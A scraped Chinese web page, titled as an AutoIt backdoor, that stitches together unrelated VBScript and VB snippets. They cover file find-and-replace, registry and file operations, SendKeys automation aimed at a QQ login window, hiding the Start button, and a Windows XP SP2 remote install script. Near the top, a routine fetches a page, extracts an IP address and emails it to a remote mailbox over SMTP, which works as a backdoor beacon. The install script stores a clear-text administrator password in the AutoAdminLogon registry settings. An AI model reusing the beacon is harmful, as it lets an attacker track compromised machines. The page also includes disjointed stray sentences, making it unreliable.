autoit脚本后门以行读取文件


  

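'' getIP
' Request a text page over HTTP and keep the text found between the first "["
' and the "]" that follows it. The result is left in the global variable ss;
' ss is "" when the request fails or the brackets are missing.
' The response body is remote, untrusted text: ss is only sliced here, never
' validated as an address.
Set http = CreateObject("Microsoft.XMLHTTP")
ipp = ""                                  ' URL of the page to query; empty on this page, must be supplied
ss = ""
If ipp <> "" Then
    http.open "get", ipp, False           ' False = synchronous request
    http.send
    If http.status = 200 Then
        ss = bytes2BSTR(http.responseBody)
        intStrA = InStr(1, ss, "[", 1)
        intStrB = 0
        If intStrA > 0 Then intStrB = InStr(intStrA + 1, ss, "]", 1)
        If intStrB > intStrA Then
            ' text strictly between the two brackets
            ss = Mid(ss, intStrA + 1, intStrB - intStrA - 1)
        Else
            ' the original sliced with a negative length here and raised an error
            ss = ""
        End If
    End If
End If
'wscript.echo ss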

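Function bytes2BSTR(vIn)
    ' Convert a raw byte string (such as XMLHTTP.responseBody) to a VBScript
    ' string. A byte below &H80 becomes one character; any other byte is
    ' combined with the byte after it and passed to Chr() as one two-byte code.
    ' An unpaired lead byte at the very end of the input is dropped.
    ' NOTE(review): Chr() with a two-byte code presumably needs a double-byte
    ' system ANSI code page (the page targets Chinese Windows) - confirm before
    ' using this on other locales.
    Dim strReturn, i, byteCount, ThisCharCode, NextCharCode
    strReturn = ""
    byteCount = LenB(vIn)
    i = 1
    Do While i <= byteCount
        ThisCharCode = AscB(MidB(vIn, i, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        ElseIf i < byteCount Then
            NextCharCode = AscB(MidB(vIn, i + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            i = i + 1                     ' the trail byte has been consumed
        End If
        ' no Else: a lead byte with nothing after it would make AscB("") raise
        i = i + 1
    Loop
    bytes2BSTR = strReturn
End Function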

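'' SendEmail
' Send the text held in ss (set by the getIP step) followed by today's date
' through an authenticated SMTP server, using CDO.
' The configuration field names below only take effect with the full CDO schema
' prefix; the page shows an empty prefix, which leaves the settings unapplied.
' NOTE(review): the account name and password are literals in the script, and
' basic authentication on port 25 without the "smtpusessl" field sends them and
' the message body unencrypted. A script host opening outbound SMTP sessions is
' also an unusual pattern that mail/egress monitoring can key on.
NameSpace = "http://schemas.microsoft.com/cdo/configuration/"
Set Email = CreateObject("CDO.Message")
Email.From = "发送邮箱"                    ' placeholder: sender address
Email.To = "接收邮箱"                      ' placeholder: recipient address
Email.Subject = "主题"                     ' placeholder: subject line
Email.Textbody = ss & date()               ' ss is the value obtained by the getIP step
'Email.AddAttachment "C:\foo.zip"          ' optional: path of a file to attach
With Email.Configuration.Fields
    .Item(NameSpace & "sendusing") = 2             ' 2 = send over the network to smtpserver
    .Item(NameSpace & "smtpserver") = "smtp.163.com" ' SMTP server address
    .Item(NameSpace & "smtpserverport") = 25
    .Item(NameSpace & "smtpauthenticate") = 1      ' 1 = basic (user name / password) authentication
    .Item(NameSpace & "sendusername") = "账户名,发送邮箱的"   ' placeholder: account name of the sender
    .Item(NameSpace & "sendpassword") = "密码"     ' placeholder: password
    .Update
End With
Email.Send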

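' Replace every occurrence of a string in a text file, in place.
' Arguments: 0 = text to find, 1 = replacement text, 2 = file to edit.
' (The page lost the spaces between keywords and identifiers; they are restored here.)
Dim FileName, Find, ReplaceWith, FileContents, dFileContents
If WScript.Arguments.Count < 3 Then
    ' indexing a missing argument would otherwise raise a subscript error
    WScript.Echo "Usage: " & WScript.ScriptName & " <find> <replace-with> <file>"
    WScript.Quit 1
End If
Find = WScript.Arguments(0)
ReplaceWith = WScript.Arguments(1)
FileName = WScript.Arguments(2)

' Read the file.
FileContents = GetFile(FileName)

' Replace all matches; the final 1 selects a text (case-insensitive) comparison.
dFileContents = Replace(FileContents, Find, ReplaceWith, 1, -1, 1)

' Only rewrite the file when the replacement changed something.
If dFileContents <> FileContents Then
    ' The file is overwritten directly; no backup copy is kept.
    WriteFile FileName, dFileContents

    WScript.Echo "Replace done."
    If Len(ReplaceWith) <> Len(Find) Then
        ' Number of replacements = total length change / length change per replacement.
        WScript.Echo _
            ((Len(dFileContents) - Len(FileContents)) / (Len(ReplaceWith) - Len(Find))) & _
            " replacements."
    End If
Else
    WScript.Echo "Searched string Not In the source file"
End If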

'读取文件
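Function GetFile(FileName)
    ' Return the whole content of the text file FileName.
    ' The result is left unassigned (Empty) when FileName is "" or when the
    ' file cannot be opened or read; errors are suppressed, not reported.
    Dim FS, FileStream
    If FileName <> "" Then
        Set FS = CreateObject("Scripting.FileSystemObject")
        On Error Resume Next
        Set FileStream = FS.OpenTextFile(FileName)
        If Err.Number = 0 Then
            GetFile = FileStream.ReadAll
            FileStream.Close              ' the original left the stream open
        End If
        On Error GoTo 0
    End If
End Function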

'写文件
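Function WriteFile(FileName, Contents)
    ' Overwrite (or create) the text file FileName with Contents.
    ' Returns True when the file was opened and written, False otherwise;
    ' errors are suppressed rather than raised, as in the original.
    Dim OutStream, FS

    On Error Resume Next
    Set FS = CreateObject("Scripting.FileSystemObject")
    Set OutStream = FS.OpenTextFile(FileName, 2, True)   ' 2 = open for writing, True = create if missing
    If Err.Number = 0 Then
        OutStream.Write Contents
        OutStream.Close                   ' flush and release the handle
    End If
    WriteFile = (Err.Number = 0)
End Function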
1、在VB4.0中打开一个新工程文件,在FORM1上添加一个命令按钮Command1



注册表的修改/读取/删除/创建
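' Syntax reference for registry access through WScript.Shell.
' %Path%, %Value% and %RegType% are placeholders, not runnable values.
' RegWrite always takes a value argument; a name that ends with "\" addresses a
' key (its default value), any other name addresses a named value.
' Writes under HKLM need an elevated (administrator) script host.
Set wso = CreateObject("WScript.Shell")           ' create the shell object
wso.RegWrite "%Path%\", ""                        ' create a subkey (name ends with "\")
wso.RegWrite "%Path%\", "%Value%"                 ' set the key's default value
wso.RegWrite "%Path%", "%Value%", "%RegType%"     ' set a value of a specific type
' %RegType% is passed as a string: "REG_SZ" (string), "REG_EXPAND_SZ"
' (expandable string), "REG_DWORD" (DWORD) or "REG_BINARY" (binary).

Set WSHShell = WScript.CreateObject("WScript.Shell")
WSHShell.RegRead("%Path%")                        ' read a subkey or value (typically used to test whether something has already happened)

Set wso = CreateObject("WScript.Shell")
wso.RegDelete "%Path%"                            ' delete a subkey or value
' Root key abbreviations: HKEY_CLASSES_ROOT = HKCR, HKEY_CURRENT_USER = HKCU,
' HKEY_LOCAL_MACHINE = HKLM; the other root keys have no abbreviation.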


程序代码

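' Example: create a scratch key, set its default value, add a value, delete the key.
' NOTE(review): the page prints the key as "HKLMSOFTWAREMicrosftWindowsNT#1"
' with the path separators lost. Only the separators are reconstructed below;
' the spelling of each path component is kept exactly as printed - confirm the
' intended key before running. Writing under HKLM needs an elevated script host.
Const DEMO_KEY = "HKLM\SOFTWARE\Microsft\WindowsNT\#1\"
Set wso = CreateObject("WScript.Shell")
wso.RegWrite DEMO_KEY, ""                         ' create the key (RegWrite requires a value argument)
wso.RegWrite DEMO_KEY, "0"                        ' set the key's default value
wso.RegWrite DEMO_KEY & "#2", 0, "REG_BINARY"     ' the type is a string; unquoted it was an undefined variable
wso.RegDelete DEMO_KEY                            ' remove the key again
WScript.Quit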


文件的复制/删除/创建/简单的写入
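' Syntax reference for basic file operations through Scripting.FileSystemObject.
' %PATH% and %PATH2% are placeholders, not runnable values.
Set fso = WScript.CreateObject("Scripting.FileSystemObject")   ' create the file system object
Set f = fso.CreateTextFile("%PATH%")      ' create the file; the variable name f is arbitrary, the path includes the extension
f.WriteLine "VBS"                         ' write one line of text to the file
f.Close
Set c = fso.GetFile("%PATH%")             ' get a File object for the file to copy
c.Copy "%PATH2%"                          ' copy the file to the destination
fso.DeleteFile "%PATH%"                   ' delete the file
WScript.Quit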


程序代码

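' Example: create C:\Sample.txt, write one line, copy it to D:\ and delete the original.
' NOTE(review): the page prints the paths as "C:Sample.txt" / "D:Sample.txt";
' the backslash after the drive letter is reconstructed here (without it the
' path is resolved against the current directory of that drive) - confirm.
Set fso = WScript.CreateObject("Scripting.FileSystemObject")
Set f = fso.CreateTextFile("C:\Sample.txt")
f.WriteLine "VBS"                         ' the original called WriteLine without the f. object
f.Close
Set e = fso.GetFile("C:\Sample.txt")      ' paths must be quoted string literals
e.Copy "D:\Sample.txt"
fso.DeleteFile "C:\Sample.txt"
WScript.Quit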


向应用程序输出简单的连串指令
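' Syntax reference: start a program and send it a sequence of keystrokes.
' %Path%, %WindowsName% and %KeyBoardName% are placeholders.
Dim program1                                  ' path of the application to start
program1 = "%Path%"
Set wshshell = CreateObject("WScript.Shell")  ' create the shell object
Set oexec = wshshell.Exec(program1)           ' start the program
WScript.Sleep 2000                            ' pause 2000 ms so the window exists before it is activated
' AppActivate returns True only when the window was found and given focus.
' SendKeys types into whichever window has focus, so the keys are sent only
' after a successful activation; otherwise they would land in another window.
If wshshell.AppActivate("%WindowsName%") Then
    wshshell.SendKeys "+{%KeyBoardName%}"     ' "+" is the SHIFT modifier for the key that follows
    wshshell.SendKeys "555555"                ' type text into the program's input field
End If
' Before using this sequence, make sure the target program accepts a run of
' keystrokes; the author notes it suits a QQ login window best (example below).
' NOTE(review): anything typed this way, a password included, sits in the
' script as clear text and is readable by anyone who can read the file.
'*ModuleName:Start_Module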
'*ModuleFilename:Start.bas
'*********************************************************
'*Comments:Show/Hidethestartbutton
'********************************************************
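' Win32 imports from user32 (ANSI entry points where an alias is given).
' FindWindow / FindWindowEx return a window handle, or 0 when nothing matches.
Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long

Private Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long

Private Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long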

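Public Function hideStartButton()
    ' Hides the Start button: finds the taskbar window (class "Shell_TrayWnd"),
    ' then its first child of class "Button", and hides that child.
    ' NOTE(review): presumably only older Windows shells keep the Start button
    ' as a "Button" child of the taskbar - confirm on the target version.
    Dim OurParent As Long, OurHandle As Long
    OurParent = FindWindow("Shell_TrayWnd", "")
    OurHandle = FindWindowEx(OurParent, 0, "Button", vbNullString)
    ' 0 = SW_HIDE; skip the call when no button was found
    If OurHandle <> 0 Then ShowWindow OurHandle, 0
End Function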

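Public Function showStartButton()
    ' Shows the Start button again: same lookup as hideStartButton (taskbar
    ' window of class "Shell_TrayWnd", first child of class "Button").
    Dim OurParent As Long, OurHandle As Long
    OurParent = FindWindow("Shell_TrayWnd", "")
    OurHandle = FindWindowEx(OurParent, 0, "Button", vbNullString)

    ' 5 = SW_SHOW; skip the call when no button was found
    If OurHandle <> 0 Then ShowWindow OurHandle, 5
End Function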

#3 语句:“WScript.Sleep 8000”。其中 8000 是延时的时间,以毫秒为单位,8000 表示延时 8 秒。
InStrRev返回一个字符串在另一个字符串出现的位置,充分利用它可以轻而易举地截取所要的内容


'******************************************************************************
' install.vbs
' Author: Peter Costantini, the Microsoft Scripting Guys
' Date: 9/1/04
' Must be deployed to a client and launched remotely by scenario1.vbs.
' Assumes that runonce.vbs is in same directory as script.
' Assumes that Windows XP Service Pack 2 setup program is on a remote server
' and runonce.vbs are in same directory as script.
' 1. Runs Service Pack 2 setup program from remote server to install
'    Windows XP Service Pack 2. This could take one or two hours.
' 2. Configures the AutoAdmin and RunOnce registry settings necessary
'    to run runonce.vbs.
' 3. Logs results to text file, <computername>-sp2-instlog.txt and copies
'    the file back to admin workstation.
' 4. Forces a reboot of the local machine so that the AutoAdmin and RunOnce
'    registry settings take effect.
'******************************************************************************

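' Main flow: open the log, install the service pack, configure automatic
' logon plus the RunOnce entry, then reboot. Either step returning False copies
' the log back and ends the script.
' (The page lost the spaces between keywords, identifiers and words in string
' literals; they are restored here.)
On Error Resume Next

' Initialize global constants and variables.
Const FOR_APPENDING = 8
g_strLocalFolder = "c:\temp-ac"
' Change name of computer to actual administrative workstation or local
' path to which log should be copied.
g_strRemoteFolder = "\\<adminwkstn>\c$\temp-ac"

' Get computer name.
g_strComputer = GetComputerName
g_strLogFile = g_strComputer & "-sp2-instlog.txt"

' Create log file (relative name, so it is created in the current directory).
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objTextStream = objFSO.OpenTextFile(g_strLogFile, FOR_APPENDING, True)
objTextStream.WriteLine "Windows XP Service Pack 2 " & _
    "Installation and Configuration Log: Phase 1"
objTextStream.WriteLine Now
objTextStream.WriteLine g_strComputer
objTextStream.WriteLine String(Len(g_strComputer), "-")

' Handle logic of calling functions and sub-routines to install Service Pack 2
' and configure AutoAdministration.
blnInstallSP = InstallSP
If blnInstallSP = False Then
    CopyLog
    WScript.Quit
End If
blnAutoAdmin = ConfigAutoAdmin
If blnAutoAdmin = False Then
    CopyLog
    WScript.Quit
End If
Reboot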

'******************************************************************************

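Function GetComputerName

    ' Returns the Name property of Win32_ComputerSystem on the local machine
    ' ("." in the WMI moniker), queried through WMI.
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\." _
        & "\root\cimv2")
    Set colSystems = objWMIService.ExecQuery("SELECT * FROM Win32_ComputerSystem")
    ' The last instance in the collection wins.
    For Each objSystem In colSystems
        GetComputerName = objSystem.Name
    Next

End Function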

'******************************************************************************

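Function InstallSP

    ' Runs the Service Pack 2 setup program from a network share and waits for
    ' it to finish. Returns True when setup could be started and has ended,
    ' False when it could not be started. Progress goes to objTextStream.
    '
    ' A global "On Error Resume Next" does not apply inside a procedure, so the
    ' error check below only works with error handling enabled locally.
    On Error Resume Next

    ' Edit this line to include the server and share name where the Windows XP
    ' Service Pack 2 setup program is located.
    ' NOTE(review): the executable is run straight from the share with no
    ' signature or hash check, so write access to that share should be limited
    ' to administrators.
    strInstallPath = "\\servername\xpsp2\WindowsXP-KB835935-SP2-ENU.exe" & _
        " /quiet /norestart /o"

    Set WshShell = CreateObject("Wscript.Shell")
    Err.Clear                              ' ignore any stale error from earlier code
    Set objExec = WshShell.Exec(strInstallPath)
    ' Capture the launch result before any other call can overwrite it.
    intExecErr = Err.Number
    strExecSource = Err.Source
    strExecDescription = Err.Description
    ' This could take one or two hours.
    objTextStream.WriteLine "Installation started..."
    If intExecErr = 0 Then
        ' Loop until Exec is finished - Status = 1.
        Do While objExec.Status = 0
            ' Pause for 10 seconds before checking.
            ' To reduce network traffic, make interval longer.
            WScript.Sleep 10000
        Loop
        objTextStream.WriteLine "Service Pack 2 installation completed."
        ' NOTE(review): the exit code is logged but not used to decide success;
        ' confirm which codes the setup program returns before relying on it.
        objTextStream.WriteLine "Setup exit code: " & objExec.ExitCode
        InstallSP = True
    Else
        objTextStream.WriteLine "Unable to install Service Pack 2." & VbCrLf & _
            "Error connecting to Service Pack 2 on server." & VbCrLf & _
            "Error number: " & intExecErr & VbCrLf & _
            "Error source: " & strExecSource & VbCrLf & _
            "Error description: " & strExecDescription
        InstallSP = False
    End If
    Err.Clear

End Function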

'******************************************************************************

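Function ConfigAutoAdmin

    ' Configures automatic logon under the Winlogon key and adds a RunOnce entry
    ' that starts runonce.vbs from g_strLocalFolder. Returns True when every
    ' registry write returned 0, False otherwise. Results go to objTextStream.
    '
    ' NOTE(review): DefaultPassword is written as a clear-text string value, and
    ' the same password is a literal in this script. runonce.vbs is not shown
    ' here - confirm it removes DefaultPassword and turns AutoAdminLogon off.
    ' NOTE(review): the RunOnce entry runs a script from g_strLocalFolder at the
    ' next logon, which is the automatic administrator logon; that folder should
    ' be writable by administrators only.
    On Error Resume Next

    Const HKEY_LOCAL_MACHINE = &H80000002
    strKeyPath1 = "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
    strKeyPath2 = "SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce"
    strDefaultUserName = "Administrator"
    strDefaultPassword = "P@ssw0rd"
    strDefaultDomainName = "Contoso"
    intAutoAdminLogon = 1
    strRunOnceEntry = "MyScript"
    strRunoncePath = g_strLocalFolder & "\runonce.vbs"

    ' The moniker needs "\\" before the computer name; the page shows a single "\".
    Err.Clear
    Set objReg = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & _
        g_strComputer & "\root\default:StdRegProv")
    If Err.Number <> 0 Then
        objTextStream.WriteLine "Error: AutoAdminLogon and RunOnce not fully " & _
            "configured."
        Err.Clear
        ConfigAutoAdmin = False
        Exit Function
    End If

    ' Set strDefaultUserName to user with Administrator credentials.
    intRet1 = objReg.SetStringValue(HKEY_LOCAL_MACHINE, strKeyPath1, _
        "DefaultUserName", strDefaultUserName)
    If intRet1 <> 0 Then
        objTextStream.WriteLine "Error: DefaultUserName not configured."
    End If

    ' Set strDefaultPassword to password of default username.
    intRet2 = objReg.SetStringValue(HKEY_LOCAL_MACHINE, strKeyPath1, _
        "DefaultPassword", strDefaultPassword)
    If intRet2 <> 0 Then
        objTextStream.WriteLine "Error: DefaultPassword not configured."
    End If

    ' The domain write is optional; it counts as succeeded while disabled.
    intRet3 = 0
    ' Uncomment next 5 lines and edit last parameter if default domain
    ' for the credentials is different from that already set.
    'intRet3 = objReg.SetStringValue(HKEY_LOCAL_MACHINE, strKeyPath1, _
    '    "DefaultDomainName", strDefaultDomainName)
    'If intRet3 <> 0 Then
    '    objTextStream.WriteLine "Error: DefaultDomainName not configured."
    'End If

    ' Turn on AutoAdminLogon
    intRet4 = objReg.SetStringValue(HKEY_LOCAL_MACHINE, strKeyPath1, _
        "AutoAdminLogon", "1")
    If intRet4 <> 0 Then
        objTextStream.WriteLine "Error: AutoAdminLogon not configured."
    End If

    ' Add MyScript entry to RunOnce subkey.
    intRet5 = objReg.SetStringValue(HKEY_LOCAL_MACHINE, strKeyPath2, _
        strRunOnceEntry, strRunoncePath)
    If intRet5 <> 0 Then
        objTextStream.WriteLine "Error: MyScript RunOnce entry not configured."
    End If

    ' Check that all registry write operations succeeded. Each code is tested
    ' on its own so that codes of opposite sign cannot cancel out in a sum.
    If intRet1 = 0 And intRet2 = 0 And intRet3 = 0 And intRet4 = 0 And intRet5 = 0 Then
        objTextStream.WriteLine "AutoAdminLogon and RunOnce configured."
        ConfigAutoAdmin = True
    Else
        objTextStream.WriteLine "Error: AutoAdminLogon and RunOnce not fully " & _
            "configured."
        ConfigAutoAdmin = False
    End If

End Function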

'******************************************************************************

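Sub Reboot

    ' Copies the log back, then asks WMI to reboot this machine. When the
    ' reboot call returns a non-zero code, the log is reopened, the failure is
    ' recorded and the log is copied again.
    Const FORCED_REBOOT = 6
    ' The (Shutdown) privilege is requested in the moniker; the moniker needs
    ' "\\" before the computer name (the page shows a single "\").
    Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate," & _
        "(Shutdown)}!\\" & g_strComputer & "\root\cimv2")
    Set colOSes = objWMIService.ExecQuery("SELECT * FROM Win32_OperatingSystem")
    objTextStream.WriteLine "Attempting to reboot..."
    CopyLog                                ' CopyLog also closes the log stream
    For Each objOS In colOSes 'Only one objOS in collection
        intReturn = objOS.Win32Shutdown(FORCED_REBOOT)
        If intReturn <> 0 Then
            ' The stream was closed by CopyLog, so reopen it to record the failure.
            Set objTextStream = objFSO.OpenTextFile(g_strLogFile, FOR_APPENDING, True)
            objTextStream.WriteLine Now
            objTextStream.WriteLine "Error: Unable to reboot. " & VbCrLf & _
                "Return code: " & intReturn
            CopyLog
        End If
    Next

End Sub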

'******************************************************************************

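Sub CopyLog

    ' Writes a closing section to the log, closes it and copies the file into
    ' g_strRemoteFolder, creating that folder first when it does not exist.
    ' A global "On Error Resume Next" does not apply inside a procedure, so the
    ' Err check below only works with error handling enabled locally.
    On Error Resume Next

    'Close text file.
    objTextStream.WriteLine "Closing log and attempting to copy file to " & _
        "administrative workstation."
    objTextStream.WriteLine
    objTextStream.WriteLine String(80, "-")
    objTextStream.WriteLine
    objTextStream.Close

    'Copy log.
    If Not objFSO.FolderExists(g_strRemoteFolder) Then
        Err.Clear
        objFSO.CreateFolder(g_strRemoteFolder)
        If Err <> 0 Then
            Err.Clear
            Exit Sub
        End If
    End If
    ' The trailing "\" makes the destination a folder; the page lost it.
    objFSO.CopyFile g_strLogFile, g_strRemoteFolder & "\"

End Sub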

VB在内部使用最简单、最可能的数据类型保存符号数值,这意味着最通常的数字类型-比如0或者1-都按照Integer类型存储Set fs=CreateObject("Scripting.FileSystemObject")
